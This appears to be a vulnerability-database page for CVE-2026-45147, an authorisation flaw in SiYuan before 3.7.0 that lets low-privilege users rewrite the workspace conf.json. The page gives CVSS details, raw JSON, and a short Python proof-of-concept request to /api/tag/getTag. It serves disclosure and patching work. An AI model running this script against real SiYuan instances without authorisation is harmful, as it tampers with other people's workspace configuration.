Security Vulnerability Report
中文
CVE-2026-45147 CVSS 4.3 MEDIUM

CVE-2026-45147

Published: 2026-05-14 19:16:39
Last Modified: 2026-05-14 21:22:56
Source: [email protected]

Description

SiYuan is an open-source personal knowledge management system. Prior to 3.7.0, POST /api/tag/getTag is registered with model.CheckAuth only, omitting both model.CheckAdminRole and model.CheckReadonly, despite the handler performing a configuration write that is normally guarded by both. Any authenticated user — including publish-service RoleReader accounts and RoleEditor accounts on a read-only workspace — can call this endpoint with a sort argument to mutate model.Conf.Tag.Sort and trigger model.Conf.Save(), which atomically rewrites the entire workspace conf.json. This vulnerability is fixed in 3.7.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SiYuan < 3.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (example) target_url = "http://localhost:6806/api/tag/getTag" # Cookies representing a low-privilege authenticated user (e.g., RoleReader) # Replace 'YOUR_SESSION_TOKEN_HERE' with a valid session cookie cookies = { "siyuan_session_id": "YOUR_SESSION_TOKEN_HERE" } # The 'sort' argument is used to mutate model.Conf.Tag.Sort # The payload structure depends on the internal handling, but sending a modified sort triggers the write payload = { "sort": "modified_value_or_structure" } try: # Send POST request to the vulnerable endpoint response = requests.post(target_url, json=payload, cookies=cookies) if response.status_code == 200: print("[+] Request sent successfully. Check if conf.json was modified.") print("[+] Response:", response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45147", "sourceIdentifier": "[email protected]", "published": "2026-05-14T19:16:38.630", "lastModified": "2026-05-14T21:22:56.313", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SiYuan is an open-source personal knowledge management system. Prior to 3.7.0, POST /api/tag/getTag is registered with model.CheckAuth only, omitting both model.CheckAdminRole and model.CheckReadonly, despite the handler performing a configuration write that is normally guarded by both. Any authenticated user — including publish-service RoleReader accounts and RoleEditor accounts on a read-only workspace — can call this endpoint with a sort argument to mutate model.Conf.Tag.Sort and trigger model.Conf.Save(), which atomically rewrites the entire workspace conf.json. This vulnerability is fixed in 3.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-6r88-8v7q-q4p2", "source": "[email protected]"}, {"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-6r88-8v7q-q4p2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.